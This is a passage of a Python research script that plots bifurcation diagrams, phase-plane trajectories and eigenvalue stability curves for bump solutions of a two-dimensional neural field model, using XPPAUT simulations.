axins21.plot(data[:,0],data[:,3],color='green',lw=3,zorder=0)
#axins21.text(.866,1.04,'**',size=20)
axins21.set_xlim(.865,.88)
axins21.set_ylim(.7,1.1)
axins21.set_xticks([])
axins21.set_yticks([])
axins21.spines['bottom'].set_color('gray')
axins21.spines['top'].set_color('gray')
axins21.spines['right'].set_color('gray')
axins21.spines['left'].set_color('gray')
#mark_inset(ax21, axins21, loc1=2, loc2=1, fc="none", ec="0.5")
#plt.xticks(visible=False)
#plt.yticks(visible=False)
# label bifurcations
ax11.annotate("LP1",
xy=(.8188,.9727), xycoords='data',
xytext=(.8188,1.05), textcoords='data',
size=15,
color='purple',
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black')
)
ax11.annotate("PD1",
xy=(1.64,.59), xycoords='data',
xytext=(1.2,.55), textcoords='data',
size=15,
color='black',
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black')
)
ax11.annotate("PD2",
xy=(1.75,.58), xycoords='data',
xytext=(1.5,.51), textcoords='data',
size=15,
color='black',
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black')
)
ax11.annotate("PD3",
xy=(1.796,.58), xycoords='data',
xytext=(1.7,.5), textcoords='data',
size=15,
color='black',
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black')
)
ax11.annotate("LP*",
xy=(1.818,.59), xycoords='data',
xytext=(1.9,.5), textcoords='data',
size=15,
color='purple',
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black')
)
ax11.annotate("BP1",
xy=(2.,.56), xycoords='data',
xytext=(2.1,.56), textcoords='data',
size=15,
color='blue',
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black')
)
ax11.annotate("LP2",
xy=(2.03,.59), xycoords='data',
xytext=(2.1,.65), textcoords='data',
size=15,
color='purple',
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black')
)
ax11.annotate('PD4',
xy=(1.738, .65), xycoords='data',
xytext=(1.5, .9), textcoords='data',
size=12,
color='.25',
zorder=-1,
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='.25'),
)
ax11.annotate('PD5',
xy=(1.738, .68), xycoords='data',
xytext=(1.7, .85), textcoords='data',
size=12,
color='.25',
zorder=-1,
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='.25'),
)
ax21.annotate("HB",
xy=(.65,.0), xycoords='data',
xytext=(.7,.06), textcoords='data',
size=15,
color='orange',
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black')
)
axins21.annotate("TR*",
xy=(.8761,.99), xycoords='data',
xytext=(.878,1.02), textcoords='data',
size=15,
color='red',
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black')
)
ax11.annotate("TR2",
xy=(1.18,.95), xycoords='data',
xytext=(1.4,1), textcoords='data',
size=15,
color='red',
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black')
)
#ax11.xaxis.set_ticks_position('top')
ax11.set_ylim(.48,1.1)
ax21.set_ylim(-.01,.22)
ax11.spines['bottom'].set_visible(False)
ax21.spines['top'].set_visible(False)
ax11.xaxis.tick_top()
ax11.tick_params(labeltop='off')
ax21.xaxis.tick_bottom()
ax11.set_ylabel('$sx$')
ax11.set_xlim(.51,2.3)
#ax11.xaxis.set_ticks_position('top')
#ax21.xaxis.set_ticks_position('bottom')
ax21.set_xlabel('$g$')
ax21.xaxis.set_label_coords(1.,0)
d = .015 # how big to make the diagonal lines in axes coordinates
# arguments to pass to plot, just so we don't keep repeating them
kwargs = dict(transform=ax11.transAxes, color='k', clip_on=False)
ax11.plot((-d, +d), (-d, +d), **kwargs) # top-left diagonal
ax11.plot((1 - d, 1 + d), (-d, +d), **kwargs) # top-right diagonal
kwargs.update(transform=ax21.transAxes) # switch to the bottom axes
ax21.plot((-d, +d), (1 - d, 1 + d), **kwargs) # bottom-left diagonal
ax21.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs) # bottom-right diagonal
# LOOP OVER SAMPLE SOLUTIONS
rlist = [519,1372,886,1164,1654,2349,240,1900]#[957,998,1206,655,634,587,8]
loclist = [(4,0),(4,1),(4,2),(0,3),(1,3),(2,3),(3,3),(4,3)]
labellist = [r'\textbf{A}',r'\textbf{B}',r'\textbf{C}',r'\textbf{D}',r'\textbf{E}',r'\textbf{F}',r'\textbf{G}',r'\textbf{H}']
pos = []
axlist = []
for i in range(len(rlist)):
rown = rlist[i]
g = bif_data[rown,3]
per = bif_data[rown,5]
init = init_data[rown,5:]
dt = .01
#print g,per,bif_data[rown,6:6+10]
print 'g=',g,'g=',init_data[rown,2],'per=',init_data[rown,4],'init=',init
npa, vn = xpprun('twodphs3.ode',
xppname='xppaut',
inits={'x':init[0],'y':init[1],
'cxs':init[2],'cys':init[3],
'sxs':init[4],'sys':init[5],
'sxsys':init[6],'sxcys':init[7],
'cxsys':init[8],'cxcys':init[9]},
parameters={'total':per,
'g':g,
'q':0.1,
'dt':dt},
clean_after=True)
t = npa[:,0]
sv = npa[:,1:]
idx = vn.index('sxs')
sxsval = bif_data[rown,6+idx]
#axlist.append(plt.subplot2grid((4,4),loclist[i]))
axlist.append(plt.subplot(gs[loclist[i][0],loclist[i][1]]))
### PLOT SAMPLE SOLUTIONS
xval = np.mod(sv[:,vn.index('x')]+pi,2*pi)-pi
yval = np.mod(sv[:,vn.index('y')]+pi,2*pi)-pi
pos1 = np.where(np.abs(np.diff(xval)) >= 1)[0]
pos2 = np.where(np.abs(np.diff(yval)) >= 1)[0]
xval[pos1] = np.nan
yval[pos2] = np.nan
xval[pos2] = np.nan
yval[pos2] = np.nan
#for slc in unlink_wrap(xval):
# axlist[i].plot(xval[slc],yval[slc],color='black',lw=2)
dashes = []
print bif_data[rown,0]
if abs(bif_data[rown,0]) == 4.:
dashes = (5,3)
axlist[i].plot(xval,yval,color='black',lw=2,dashes=dashes)
# label 2 points with arrows
back_idx = 10
idxlist = [10,int(1.*(per/dt)/2.)]# depends on period
if i == 0:
factor = 1.3
back_idx = 400
else:
factor = 1.
for j in idxlist:
axlist[i].annotate("",
xy=(factor*xval[j], factor*yval[j]), xycoords='data',
xytext=(factor*xval[j-back_idx], factor*yval[j-back_idx]), textcoords='data',
size=15,
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black')
)
axlist[i].set_xlim(-pi,pi)
axlist[i].set_ylim(-pi,pi)
axlist[i].tick_params(axis=u'both',which=u'both',length=0)
axlist[i].set_xticks(np.arange(-1,1+1,1)*pi)
axlist[i].set_yticks(np.arange(-1,1+1,1)*pi)
x_label = [r"$-\pi$", r"$0$", r"$\pi$"]
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
axlist[i].set_xticklabels(x_label)
axlist[i].set_yticklabels(x_label)
if i >= 3:
axlist[i].yaxis.tick_right()
if i < 3:
axlist[i].set_yticklabels([])
if i >= 3 and i < len(labellist)-1:
axlist[i].set_xticklabels([])
# annotations corresponding to solution plots
ax21.annotate(labellist[i],
xy=(g, sxsval), xycoords='data',
xytext=(g, sxsval), textcoords='data',
size=12,
backgroundcolor='yellow',
zorder=-1
#arrowprops=dict(arrowstyle="-|>",
# connectionstyle="arc3",
# color=str(color)),
)
ax11.annotate(labellist[i],
xy=(g, sxsval), xycoords='data',
xytext=(g, sxsval), textcoords='data',
size=12,
backgroundcolor='yellow',
zorder=-1
#arrowprops=dict(arrowstyle="-|>",
# connectionstyle="arc3",
# color=str(color)),
)
axins21.annotate(labellist[i],
xy=(g, sxsval), xycoords='data',
xytext=(g, sxsval), textcoords='data',
size=12,
backgroundcolor='yellow',
zorder=-1,
horizontalalignment='right',
#arrowprops=dict(arrowstyle="-|>",
# connectionstyle="arc3",
# color=str(color)),
)
axlist[i].set_title(labellist[i])
#ax11.
ax11.scatter(g,sxsval,s=10,color='black',marker='^',zorder=2)
ax21.scatter(g,sxsval,s=10,color='black',marker='^',zorder=2)
axins21.scatter(g,sxsval,s=10,color='black',marker='^',zorder=2)
#axins11.scatter(g,sxsval,s=10,color='black',marker='^')
#ax2.plot(t,np.mod(sv[:,vn.index('x')],2*pi))
#ax2.plot(t,np.mod(sv[:,vn.index('sxs')],2*pi))
#ax2.plot(t,np.mod(npa[:,vn.index('sxs')],2*pi))
#ax2.plot(t,np.mod(npa[:,vn.index('y')],2*pi))
return fig
def twod_phase_auto_5terms_fig():
"""
twod bifurcation diagram for truncated h
"""
#raw_data = np.loadtxt('twodphs_cys_wave_diagram_q=.125.dat')
sv = 'cys'
qval = '.5'
raw_data = np.loadtxt('twodphs_5_'+sv+'_HB_q='+qval+'.dat')
raw_data2 = np.loadtxt('twodphs_5_'+sv+'_TR_q='+qval+'.dat')
data = diagram.read_diagram(raw_data)
data2 = diagram.read_diagram(raw_data2)
fig = plt.figure()
ax = fig.add_subplot(111)
# plot unstable fixed points
ax.scatter(data[:,0],data[:,2],s=10,color='black')
ax.scatter(data[:,0],data[:,6],s=10,color='black')
#ax.scatter(data3[:,0],data3[:,2],s=10,color='black')
#ax.scatter(data3[:,0],data3[:,6],s=10,color='black')
# plot unstable periodic solutions
ax.scatter(data[:,0],data[:,4],s=10,facecolor='none',edgecolor='blue')
#ax.scatter(data[:,0],data[:,8],s=10,facecolor='none',edgecolor='blue')
# plot traveling waves
ax.scatter(data2[:,0],data2[:,4],s=10,facecolor='none',edgecolor='#0099ff')
ax.scatter(data2[:,0],data2[:,8],s=10,facecolor='none',edgecolor='#0099ff')
#ax.scatter(data3[:,0],data3[:,4],s=10,facecolor='none',edgecolor='blue')
#ax.scatter(data3[:,0],data3[:,8],s=10,facecolor='none',edgecolor='blue')
#ax.scatter(data4[:,0],data4[:,4],s=10,facecolor='none',edgecolor='#0099ff')
#ax.scatter(data4[:,0],data4[:,8],s=10,facecolor='none',edgecolor='#0099ff')
# plot stable fixed points
ax.scatter(data[:,0],data[:,1],s=10,color='red')
ax.scatter(data[:,0],data[:,5],s=10,color='red')
#ax.scatter(data3[:,0],data3[:,1],s=10,color='red')
#ax.scatter(data3[:,0],data3[:,5],s=10,color='red')
# plot stable periodic solutions
ax.scatter(data[:,0],data[:,3],s=20,color='green')
ax.scatter(data[:,0],data[:,7],s=20,color='green')
# plot stable traveling waves
ax.scatter(data2[:,0],data2[:,3],s=20,color='#00cc00')
ax.scatter(data2[:,0],data2[:,7],s=20,color='#00cc00')
#ax.scatter(data3[:,0],data3[:,3],s=20,color='green')
#ax.scatter(data3[:,0],data3[:,7],s=20,color='green')
#ax.scatter(data4[:,0],data4[:,3],s=20,color='#00cc00')
#ax.scatter(data4[:,0],data4[:,7],s=20,color='#00cc00')
#ax.set_xlim(.5,3)
#ax.set_ylim(.5,1.)
ax.set_title('q='+qval)
ax.set_ylabel(sv)
return fig
def twod_phase_auto_3terms_2par():
"""
twod, 2par bifurcation diagram
"""
data = np.loadtxt('twodphs_3_2par.dat')
data2 = np.loadtxt('twodphs_3_2par_TR.dat')
# separate by branches
# 6 = PD, 2 = LP, 3 = HB
TR = data2[(data2[:,-1]==4)]
PD = data[(data[:,-1]==6)*(data[:,-2]<9)]
PD_gray = data[(data[:,-1]==6)*(data[:,-2]>=9)*(data[:,-2]<=11)]
LP = data[data[:,-1]==2]
HB = data[data[:,-1]==3]
BP = data[data[:,-1]==5]
# remove discontinuities
TRx,TRy = clean(TR[:,0],TR[:,1],tol=.05)
PDx,PDy = clean(PD[:,0],PD[:,1],tol=.05)
PD_gx,PD_gy = clean(PD_gray[:,0],PD_gray[:,1],tol=.05)
LPx,LPy = clean(LP[:,0],LP[:,1],tol=.05)
HBx,HBy = clean(HB[:,0],HB[:,1],tol=.05)
BPx,BPy = clean(BP[:,0],BP[:,1],tol=.05)
fig = plt.figure(figsize=(5,5))
ax = fig.add_subplot(111)
ax.plot([0,2],[.1,.1],color='gray')
ax.plot(PD_gx,PD_gy,color='.35',lw=2,ls='--',dashes=(4,1))
ax.plot(TRx,TRy,color='red',lw=2)
ax.plot(PDx,PDy,color='black',lw=2)
ax.plot(HBx,HBy,color='orange',ls='--',lw=2)
ax.plot(LPx,LPy,color='purple',ls='-.',lw=2)
ax.plot(BPx,BPy,color='blue',ls='',marker='1',ms=10,lw=2)
ax.set_xlabel(r'$g$')
ax.set_ylabel(r'$q$')
# label regions
ax.annotate('1. Stationary Bump',
xy=(.5, .55), xycoords='data',
xytext=(.5, .55), textcoords='data',
size=12,
zorder=-1
)
ax.annotate('2. Wobbling Bump',
xy=(1.2, .35), xycoords='data',
xytext=(1.2, .35), textcoords='data',
size=12,
zorder=-1
)
ax.annotate('3. Sloshing and Chaos',
xy=(1.1, .15), xycoords='data',
xytext=(1.1, .25), textcoords='data',
size=12,
zorder=-1,
rotation=30
)
ax.annotate('4. Chaos',
xy=(1.1, .15), xycoords='data',
xytext=(1.3, .11), textcoords='data',
size=12,
zorder=-1,
rotation=22
)
# label branches
ax.annotate('LP1',
xy=(1.9, .35), xycoords='data',
xytext=(1.9, .35), textcoords='data',
size=12,
color='purple',
zorder=-1
)
ax.annotate('HB',
xy=(1.15, .57), xycoords='data',
xytext=(1.15, .57), textcoords='data',
size=12,
color='orange',
zorder=-1
)
ax.annotate('PD1',
xy=(1.616, .1), xycoords='data',
xytext=(1.5, .13), textcoords='data',
size=12,
color='black',
zorder=-1,
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax.annotate('PD2',
xy=(1.728, .1), xycoords='data',
xytext=(1.7, .15), textcoords='data',
size=12,
color='black',
zorder=-1,
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax.annotate('PD3',
xy=(1.81, .1), xycoords='data',
xytext=(1.85, .18), textcoords='data',
size=12,
color='black',
zorder=3,
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax.annotate('LP2',
xy=(1.8, .06), xycoords='data',
xytext=(1.8, .06), textcoords='data',
size=12,
color='purple',
zorder=-1
)
ax.annotate('BP1',
xy=(1., .06), xycoords='data',
xytext=(1., .06), textcoords='data',
size=12,
color='blue',
zorder=-1
)
ax.annotate('PD4,5',
xy=(1.75, .1), xycoords='data',
xytext=(1.6, .02), textcoords='data',
size=12,
color='.25',
zorder=-1,
arrowprops=dict(arrowstyle="wedge,tail_width=.7",
connectionstyle="arc3",
color='.25'),
)
ax.annotate('TR2',
xy=(1.2, .125), xycoords='data',
xytext=(1.2, .125), textcoords='data',
size=12,
color='red',
zorder=-1
)
ax.set_xlim(.48,2.)
ax.set_ylim(0,.6)
return fig
def get_solution(g,q,init,per,dt=1.):
"""
get solution value. specialized function for twod_full_auto_5terms_2par.
"""
npa, vn = xpprun('full2dbump.ode',
xppname='xppaut',
inits={'a0':init[0],'a10':init[1],
'a01':init[2],'a11':init[3],
'b10':init[4],'b01':init[5],
'b11':init[6],'c11':init[7],'d11':init[8],
'e0':init[9],'e10':init[10],
'e01':init[11],'e11':init[12],
'f10':init[13],'f01':init[14],
'f11':init[15],'g11':init[16],'h11':init[17]
},
parameters={'total':per,
'g':g,
'q':q,
'eps':.05,
'dt':dt},
clean_after=True)
t = npa[:,0]
sv = npa[:,1:]
idx = vn.index('a11')
#print idx, vn
b01 = sv[:,vn.index('b01')]
a01 = sv[:,vn.index('a01')]
b10 = sv[:,vn.index('b10')]
a10 = sv[:,vn.index('a10')]
xval = np.mod(np.arctan2(b01,a01)+5*pi,2*pi)-pi
yval = np.mod(np.arctan2(b10,a10)+5*pi,2*pi)-pi
pos1 = np.where(np.abs(np.diff(xval)) >= 1)[0]
pos2 = np.where(np.abs(np.diff(yval)) >= 1)[0]
xval[pos1] = np.nan
yval[pos1] = np.nan
xval[pos2] = np.nan
yval[pos2] = np.nan
return xval,yval
def get_solution_phase(g,q,init,per,dt=1.):
"""
get solution value. specialized function for twod_phase_2par.
"""
npa, vn = xpprun('twodphs3.ode',
xppname='xppaut',
inits={'x':init[0],'y':init[1],
'cxs':init[2],'cys':init[3],
'sxs':init[4],'sys':init[5],
'sxsys':init[6],'sxcys':init[7],
'cxsys':init[8],'cxcys':init[9]},
parameters={'total':per,
'g':g,
'q':q,
'eps':.05,
'dt':dt},
clean_after=True)
t = npa[:,0]
sv = npa[:,1:]
xval = np.mod(sv[:,vn.index('x')]+pi,2*pi)-pi
yval = np.mod(sv[:,vn.index('y')]+pi,2*pi)-pi
pos1 = np.where(np.abs(np.diff(xval)) >= 1)[0]
pos2 = np.where(np.abs(np.diff(yval)) >= 1)[0]
xval[pos1] = np.nan
yval[pos2] = np.nan
xval[pos2] = np.nan
yval[pos2] = np.nan
return xval,yval
def twod_phase_2par(subplots=1):
fig = plt.figure(figsize=(7,7))
gs = gridspec.GridSpec(3,3)
ax = plt.subplot(gs[:2,:2])
data = np.loadtxt('twodphs_3_2par.dat')
data2 = np.loadtxt('twodphs_3_2par_TR.dat')
# separate by branches
# 6 = PD, 2 = LP, 3 = HB
TR = data2[(data2[:,-1]==4)]
PD = data[(data[:,-1]==6)*(data[:,-2]<9)]
PD_gray = data[(data[:,-1]==6)*(data[:,-2]>=9)*(data[:,-2]<=11)]
LP = data[data[:,-1]==2]
HB = data[data[:,-1]==3]
BP = data[data[:,-1]==5]
# remove discontinuities
TRx,TRy = clean(TR[:,0],TR[:,1],tol=.05)
PDx,PDy = clean(PD[:,0],PD[:,1],tol=.05)
PD_gx,PD_gy = clean(PD_gray[:,0],PD_gray[:,1],tol=.05)
LPx,LPy = clean(LP[:,0],LP[:,1],tol=.05)
HBx,HBy = clean(HB[:,0],HB[:,1],tol=.05)
BPx,BPy = clean(BP[:,0],BP[:,1],tol=.05)
#fig = plt.figure(figsize=(5,5))
#ax = fig.add_subplot(111)
#ax.plot([0,2],[.1,.1],color='gray')
#ax.plot(PD_gx,PD_gy,color='.35',lw=2,ls='--',dashes=(4,1))
#ax.plot(TRx,TRy,color='red',lw=2)
#ax.plot(PDx,PDy,color='black',lw=2)
ax.plot(HBx,HBy,color='orange',ls='--',lw=2)
ax.plot(LPx[:100],LPy[:100],color='purple',ls='-.',lw=2)
#ax.plot(BPx,BPy,color='blue',ls='',marker='1',ms=10,lw=2)
ax.set_xlabel(r'$g$')
ax.set_ylabel(r'$q$')
# label regions
ax.annotate('1. Stationary Bump',
xy=(.5, .55), xycoords='data',
xytext=(.5, .55), textcoords='data',
size=12,
zorder=-1
)
ax.annotate('2. Wobbling Bump',
xy=(1.2, .35), xycoords='data',
xytext=(1.2, .35), textcoords='data',
size=12,
zorder=-1
)
ax.annotate('3. Chaos',
xy=(1.1, .15), xycoords='data',
xytext=(1.3, .11), textcoords='data',
size=12,
zorder=-1
)
# label branches
ax.annotate('LP1',
xy=(1.9, .35), xycoords='data',
xytext=(1.9, .35), textcoords='data',
size=12,
color='purple',
zorder=-1
)
ax.annotate('HB',
xy=(1.15, .57), xycoords='data',
xytext=(1.15, .57), textcoords='data',
size=12,
color='orange',
zorder=-1
)
# plot solutions
#
#########################################################################################
if subplots >= 1:
ax13 = plt.subplot(gs[0,-1])
x,y = get_solution_phase(0.,0.,np.zeros(18),1000,dt=1.)
ax13.set_title(r"\textbf{(a)}",x=0.1)
ax13.xaxis.tick_bottom()
ax13.xaxis.set_label_position('bottom')
ax13.scatter(x,y,color='black')
ax13.set_xlim(-pi,pi)
ax13.set_ylim(-pi,pi)
ax13.set_xticks([])
ax13.set_yticks([])
#ax13.set_xticks(np.arange(-1,1+.5,.5)*pi)
#ax13.set_yticks(np.arange(-1,1+.5,.5)*pi)
#x_label = [r"$-\pi$", r"$-\pi/2$", r"$0$", r"$\pi/2$", r"$\pi$"]
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
#ax13.set_xticklabels(x_label)
ax.annotate('', xy=(.2, .7), xycoords='axes fraction', xytext=(1.07, 1.02),
arrowprops=dict(arrowstyle="<|-|>", color='k',lw=3))
#########################################################################################
if subplots >= 2:
bif_data = np.loadtxt('twodphs_3_HB_PD_q=.1_appended.dat')
init_data = np.loadtxt('twodphs_3_init_HB_PD_q=.1_appended.dat')
rlist = [540]
rown = rlist[0]
g = bif_data[rown,3]
per = bif_data[rown,5]
init = init_data[rown,5:]
dt = .01
ax23 = plt.subplot(gs[1,-1])
x,y = get_solution_phase(g,.1,init,per,dt=dt)
ax23.set_title(r"\textbf{(b)}",x=0.1)
ax23.xaxis.tick_bottom()
ax23.xaxis.set_label_position('bottom')
ax23.plot(x,y)
ax23 = beautify_phase(ax23,x,y,per,dt)
ax23.set_xlim(-pi,pi)
ax23.set_ylim(-pi,pi)
ax23.set_xticks([])
ax23.set_yticks([])
ax.annotate('', xy=(.8, .7), xycoords='axes fraction', xytext=(1.07, .45),
arrowprops=dict(arrowstyle="<|-|>", color='k',lw=3))
#########################################################################################
if subplots >= 3:
ax33 = plt.subplot(gs[2,-1])
np.random.seed(0)
x,y = get_solution_phase(2.,0.,np.random.randn(18),100,dt=.02)
ax33.set_title(r"\textbf{(c)}",x=0.1)
ax33.xaxis.tick_bottom()
ax33.xaxis.set_label_position('bottom')
xf = x[-int(10/.02):]
yf = y[-int(10/.02):]
ax33.plot(xf,yf,lw=3,color='black')
ax33 = beautify_phase(ax33,xf,yf,10,.02,arrows=5)
ax33.set_xlim(-pi,pi)
ax33.set_ylim(-pi,pi)
ax33.set_xticks([])
ax33.set_yticks([])
ax.annotate('', xy=(.8, .01), xycoords='axes fraction', xytext=(1.07, -.2),
arrowprops=dict(arrowstyle="<|-|>", color='k',lw=3))
#########################################################################################
if subplots >= 4:
ax32 = plt.subplot(gs[-1,-2])
x,y = get_solution_phase(1.5,.1,np.random.randn(18),100,dt=.05)
ax32.set_title(r"\textbf{(d)}",x=0.1)
ax32.xaxis.tick_bottom()
ax32.xaxis.set_label_position('bottom')
xf = x[-int(30/.05):]
yf = y[-int(30/.05):]
ax32.plot(xf,yf,lw=3,color='black')
ax32 = beautify_phase(ax32,xf,yf,30,.05,arrows=4)
ax32.set_xlim(-pi,pi)
ax32.set_ylim(-pi,pi)
ax32.set_xticks([])
ax32.set_yticks([])
ax.annotate('', xy=(.75, .32), xycoords='axes fraction', xytext=(.65, -.16),
arrowprops=dict(arrowstyle="<|-|>", color='k',lw=3))
ax.set_xlim(.48,2.)
ax.set_ylim(0,.6)
return fig
def fac(nu,s0=0.,s1=10.,sn=101):
"""
nu/int e^-s H1(nu s,0)ds
"""
sarr = np.linspace(s0,s1,sn)
ds = (s1 - s0)/sn
g_denom = 0.
for s in sarr:
g_denom += np.exp(-s)*f2d.H1_fourier(nu*s,0)*ds
#print f2d.H1_fourier(nu*s,0)
#print g_denom
return nu/g_denom
def ix(nu,lam,choice=1,s0=0.,s1=10.,sn=101):
sarr = np.linspace(s0,s1,sn)
ds = (s1 - s0)/sn
i = 0.
for s in sarr:
if choice == 1:
h1x,h1y = f2d.H1_fourier(nu*s,0,d=True)
else:
h1x,h1y = f2d.H1_fourier(0,nu*s,d=True)
i += np.exp(-s)*h1x*((np.exp(-lam*s)-1)/lam)*ds
return i
def L(nu,lam,choice=1,s0=0.,s1=40.,sn=501):
"""
L1 = 1 + g int_0^\infty e^-s \pa H_1/\pa x (nu s, 0) (e^{-\lambda s} - 1)/\lambda ds
"""
sarr = np.linspace(s0,s1,sn)
ds = (s1 - s0)/sn
g_denom = 0.
for s in sarr:
g_denom += np.exp(-s)*f2d.H1_fourier(nu*s,0)*ds
#print f2d.H1_fourier(nu*s,0)
#print g_denom
factor = nu/g_denom
i = 0.
for s in sarr:
if choice == 1:
h1x,h1y = f2d.H1_fourier(nu*s,0,d=True)
else:
h1x,h1y = f2d.H1_fourier(0,nu*s,d=True)
i += np.exp(-s)*h1x*((np.exp(-lam*s)-1.)/lam)*ds
return 1. + factor*i
def L_ana(nu,lam,choice=1):
"""
analytic version of above. found using long but finite fourier truncation
"""
print 'using analytic L1,L2'
g = (1/(1.04609467947464/(1 + nu**2) + 0.06989538102574108/(1 + 4*nu**2) +
5.002469208435e-6/(1 + 9*nu**2)))
if choice == 1:
integral = (-1.04609467947464/(1 + nu**2) - 0.06989538102574108/(1 + 4*nu**2) -
5.002469208435e-6/(1 + 9*nu**2) +
(1.04609467947464*(1 + lam))/(nu**2 + (1 + lam)**2) +
(0.06989538102574108*(1 + lam))/(4*nu**2 + (1 + lam)**2) +
(5.002469208435e-6*(1 + lam))/(9*nu**2 + (1 + lam)**2))/lam
if choice == 2:
integral = (-0.6474559245027758 - 0.46310403788291776/(1 + nu**2) -
0.005435100583895982/(1 + 4*nu**2) + 0.6474559245027758/(1. + lam) +
(0.46310403788291776*(1 + lam))/(nu**2 + (1 + lam)**2) +
(0.005435100583895982*(1 + lam))/(4*nu**2 + (1 + lam)**2))/lam
return 1 + g*integral
def wave_stbl_2d(choice='axial'):
"""
compute eigenvalue as a function of traveling bump velocity in axial or diagonal directions.
\lambda_1 &= -\frac{\nu}{\int_0^\infty e^{-s} H_1(\nu s, 0) ds} \int_0^\infty e^{-s} \frac{\pa H_1}{\pa x}(\nu s, 0)[e^{-\lambda_1 s}-1]ds,\\
\lambda_2 &= \frac{\nu}{\int_0^\infty e^{-s} H_1(\nu s, 0) ds} \int_0^\infty e^{-s} \frac{\pa H_1}{\pa y}(0, \nu s)[e^{-\lambda_2 s}-1]ds.
"""
fig = plt.figure(figsize=(8,3))
ax = fig.add_subplot(121)
nu = np.linspace(.001,1.5,200)
lam = np.linspace(-.98,.98,200)
X,Y = np.meshgrid(nu,lam,indexing='xy')
#L(nu,lam,choice=1,s0=0,s1=10,sn=101):
z = L(X,Y)
z[z>=5] = 5
z[z<=-5] = -5
ax.plot([0,10],[0,0],color='gray')
cs = ax.contour(X,Y,z,levels=[-0.00001,0.,.00001])
# remove other curves
# customize desired curve
cs.collections[0].set_color('black')
cs.collections[1].set_color('black')
cs.collections[2].set_color('black')
cs.collections[1].set_linewidth(2)
#cbar = plt.colorbar(cs)
#cbar.add_lines(cs)
ax.set_ylabel(r'$\lambda_1$')
ax.set_xlabel(r'$\nu$')
#ax.annotate(r'Stability of solution $\theta_1(\tau)=\nu\tau$',xy=(5.1,.75))
#ax.annotate(r'Unstable',xy=(7.2,.05))
#ax.annotate(r'Stable',xy=(7.2,-.12))
ax2 = fig.add_subplot(122)
#nu = np.linspace(0,1.5,150)
lam = np.linspace(-.25,.25,150)
X,Y = np.meshgrid(nu,lam,indexing='xy')
z2 = L_ana(X,Y,choice=2)
z2[z2>=5] = 5
z2[z2<=-5] = -5
ax2.plot([0,10],[0,0],color='gray')
cs2 = ax2.contour(X,Y,z2,levels=[-0.00001,0.,.00001])
cs2.collections[0].set_color('black')
cs2.collections[1].set_color('black')
cs2.collections[2].set_color('black')
cs2.collections[1].set_linewidth(2)
#ax2.annotate(r'Stability of solution $\theta_2(\tau)=0$',xy=(.1,.9))
#ax2.annotate(r'Unstable',xy=(1.25,.019))
#ax2.annotate(r'Stable',xy=(1.25,-.028))
ax2.set_ylabel(r'$\lambda_2$')
ax2.set_xlabel(r'$\nu$')
ax.set_xlim(0,1.5)
ax2.set_xlim(0,1.5)
ax2.set_ylim(-.1,.25)
#ax2.set_ylabel(r'$\nu$')
#p = cs.collections[0].get_paths()[1]
#v = p.vertices
#cbar2 = plt.colorbar(cs2)
#cbar2.add_lines(cs2)
#fig.set_clabel(cs, inline=1, fontsize=10)
#print fig.__dict__
#ax.plot(v[:,0],v[:,1],color='black')
return fig
def L_gauss(nu,lam,choice=1,sig=5.):
"""
gaussian eigenvalue problem
"""
tot = 0
g_integral = 0
spi = sqrt(pi)
L1 = 1 + (5*nu**4*\
((4*lam*Sqrt(nu**2))/5. + (2*E**((4*Pi**2)/25.)*lam*Sqrt(nu**2))/5. + \
Sqrt(Pi)*(E**(25/(4.*nu**2) + (4*Pi**2)/25.)*Erfc(5/(2.*Sqrt(nu**2))) - \
E**((25*(1 + lam)**2)/(4.*nu**2) + (4*Pi**2)/25.)*(1 + lam)**2*\
Erfc((5*(1 + lam))/(2.*Sqrt(nu**2))) + \
E**((25 - 4*nu*Pi)**2/(100.*nu**2))*Erfc((25 - 4*nu*Pi)/(10.*Sqrt(nu**2))) - \
E**((25*(1 + lam) - 4*nu*Pi)**2/(100.*nu**2))*(1 + lam)**2*\
Erfc((25*(1 + lam) - 4*nu*Pi)/(10.*Sqrt(nu**2))) + \
E**((25 + 4*nu*Pi)**2/(100.*nu**2))*Erfc((25 + 4*nu*Pi)/(10.*Sqrt(nu**2)))) - \
E**((25*(1 + lam) + 4*nu*Pi)**2/(100.*nu**2))*(1 + lam)**2*Sqrt(Pi)*\
Erfc((25*(1 + lam) + 4*nu*Pi)/(10.*Sqrt(nu**2)))))/\
(lam*(nu**2)**1.5*(2*(2 + E**((4*Pi**2)/25.))*nu**2 - \
5*E**(25/(4.*nu**2) + (4*Pi**2)/25.)*Sqrt(nu**2)*Sqrt(Pi)*(1 + 2*Cosh((2*Pi)/nu)) + \
5*E**((25 - 4*nu*Pi)**2/(100.*nu**2))*nu*Sqrt(Pi)*\
(E**((2*Pi)/nu)*Erf(5/(2.*nu)) + Erf(5/(2.*nu) - (2*Pi)/5.)) + \
5*E**((25 + 4*nu*Pi)**2/(100.*nu**2))*nu*Sqrt(Pi)*Erf(5/(2.*nu) + (2*Pi)/5.)))
L2 = 1 - (2*(nu**2)**1.5*Sqrt(Pi)*(25*(2 + E**((4*Pi**2)/25.)) - 16*Pi**2)*\
(E**(25/(4.*nu**2) + (4*Pi**2)/25.)*Erfc(5/(2.*Sqrt(nu**2))) - \
